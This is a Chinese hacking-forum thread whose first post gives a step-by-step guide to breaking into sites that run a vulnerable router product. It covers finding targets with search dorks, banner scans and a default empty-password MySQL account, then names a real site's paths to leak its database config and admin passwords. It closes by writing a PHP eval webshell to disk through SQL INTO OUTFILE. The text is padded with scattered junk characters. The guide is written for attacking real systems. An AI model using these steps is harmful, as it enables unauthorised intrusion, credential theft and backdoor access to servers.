找回密码
 立即注册
查看: 3909|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:+ q- D$ f3 G& R/ f' C" l9 b* \& l6 I

$ _5 v  o$ V' d( ^# O% s1:google搜索'Raonet Subscriber Ethernet Router'4 }, g0 q* n" S- X

$ S+ q( \" B% S% w( W* r2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
6 A5 g3 ?3 E; ?
  \9 f4 }3 {7 [8 P" N+ N- o$ S3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
6 R+ l6 g+ a. I9 @* C9 h
6 k& r5 h; P/ G6 g$ l- U! W//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
( g. v- v: M* i3 f1 ]* |) d3 }6 Q1 h% Y
! ]4 h- h+ L9 p; w2 \/ P* N
  y2 D) e% B. {" W9 P' J
入侵步骤:6 \8 w4 y7 d& @# w- S! U

9 K, _- |: f: V9 x) i: o, Y+ ~1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
* ^1 o  F6 x: c4 h
# }: s  X% H/ y1 h; j0 [2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc6 R" Z7 |: U, v' r
3:得到密码后连接,查看GUI管理密码:
$ l6 \2 `5 O( j; B& ~0 ?! y( \, n6 huse ser_500/ U1 w7 L& B. U2 {  w/ c# V8 `( H
select id,passwd from user;
$ t/ h# z( B' E- U7 E9 M2 u4:通过数据库写入webshell,执行命令:
* \$ W9 f% G0 J0 M7 D& T* d3 F4 tuse mysql;
/ y9 O/ w6 |& x" u. _9 L9 o4 }8 jcreate table ok(cmd TEXT);
# J( K8 ]! _6 y5 L0 f1 q5 B& l6 yinsert into ok values("<?php @eval($_POST[cmd])?>");3 ]1 v" Y, e9 W' X3 ^/ e9 F( t
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
" a4 J2 C5 ^0 y2 B: wdrop table ok;6 @8 V& r9 i* o* S$ @
, v4 D; s4 Z& r4 m5 H- ?+ ~
5:连接后门shell.php , [+ f2 c, F9 t2 A& ]( R

: G; n+ Y* J  e  n2 s9 ]7 M6. 搞定!
: Y$ l' P# u0 D9 T" ?
$ g1 }- f. K+ G2 {
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表